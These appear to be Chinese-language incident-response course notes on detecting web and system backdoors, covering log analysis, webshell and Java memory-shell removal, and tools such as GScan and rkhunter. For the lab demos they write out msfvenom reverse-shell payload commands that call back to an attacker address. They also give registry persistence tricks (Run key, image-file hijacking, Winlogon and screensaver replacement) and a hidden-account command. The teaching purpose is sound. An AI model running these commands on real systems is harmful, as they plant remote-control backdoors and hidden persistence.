知识点
#知识点
-网页篡改与后门攻击防范应对指南
主要需了解:异常特征,处置流程,分析报告等
主要需了解:日志存储,Webshell检测,分析思路等
掌握:
中间件日志存储,日志格式内容介绍(IP,UA头,访问方法,请求文件,状态码等)
Webshell查杀(常规后门,内存马(单独还有))
分析思路:基于时间,基于漏洞,基于后门筛选(还有)#内容点:
应急响应:
1、抗拒绝服务攻击防范应对指南
2、勒索软件防范应对指南
3、钓鱼邮件攻击防范应对指南
4、网页篡改与后门攻击防范应对指南
5、网络安全漏洞防范应对指南
6、大规模数据泄露防范应对指南
7、僵尸网络感染防范应对指南
8、APT攻击入侵防范应对指南
9、各种辅助类分析工具项目使用
朔源反制:
威胁情报,信息库追踪,设备反制,IDS&IPS等反制,工具漏洞反制,蜜罐钓鱼反制等
演示案例:1、Windows-后门-常规&权限维持&内存马2、Linux-后门-常规&权限维持&Rootkit&内存马
Windows实验
1、常规MSF后门-分析检测
2、权限维持后门-分析检测
3、Web程序内存马-分析检测
常见工具集合:
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=6666 -f exe -o shell.exe
自启动测试:
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"
隐藏账户:
net user xiaodi$ xiaodi!@#X123 /add
映像劫持
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"
屏保&登录
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\shell.exe"Linux实验
1、常规MSF后门-分析检测
2、Rootkit后门-分析检测
3、权限维持后门-分析检测
4、Web程序内存马-分析检测
https://mp.weixin.qq.com/s/L3Lv06bFdUX_ZE4rS69aDg
常规后门:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=7777 -f elf >shell.elf
Rootkit后门:GScan rkhunter
权限维持后门:GScan rkhunter
1、GScan
https://github.com/grayddq/GScan
python GScan.py
2、rkhunter
wget http://downloads.sourceforge.net/project/rkhunter/rkhunter/1.4.6/rkhunter-1.4.6.tar.gz
tar -xvf rkhunter-1.4.6.tar.gz
cd rkhunter-1.4.6
./installer.sh --layout default --install
rkhunter -cWeb层面:通用系统层面
1、常规后门
2、内存马(无文件马)PHP.NETJAVAPython
总结
1、对于系统层面的后门:
1.1、windows
对于常规MSF后门,其一般会有网络外连的情况,可使用火绒剑、PCHunter工具查看网络,针对网络外连的进行逐一排查
对于权限维持后门,比如自启动、映像劫持,在火绒剑、PCHunter里也有对应的栏目,也可逐一排查1.2、linux
对于常规MSF后门,其一般会有网络外连的情况,可使用命令:netstat -anpt 针对网络外连的进行逐一排查
对于Rootkit、权限维持后门,可使用工具GScan、rkhunter进行排查2、对于Web层面的后门:
2.1、普通Web后门
基于客户反映的情况,我们拿到的信息可能是时间、漏洞,也可能什么也没有。
如果有大概时间信息,那么可以通过时间筛选日志,看IP、请求地址、UA头、响应码等定位攻击,再锁定该IP看有无其他行为
如果只知道框架信息,那么就根据框架可能存在的漏洞,复现一遍,查看新产生的日志拿到攻击指纹信息,然后以此筛选日志,定位攻击
如果没有任何信息,那么先使用后门查杀工具锁定后门,看哪个IP在访问该后门,然后针对该IP筛选日志,定位攻击2.2、内存马
PHP内存马其实是进程马,只要把对应进程停掉,删除后就没了;Java内存马才是真正意义上的内存马
Java内存马根据不同的Java中间件有不同的实现方式,比如Tomcat的内存马主要有Servlet、Filter、Listener、Tomacat Valve
使用工具查杀Java内存马:
河马的内存马查杀工具(优点:适用多种中间件的内存马;缺点:易出Bug,不支持直接Dump或Kill)
脚本 tomcat-memshell-scanner.jsp(优点:好用,支持直接Dump或Kill;缺点:只支持Tomcat的内存马)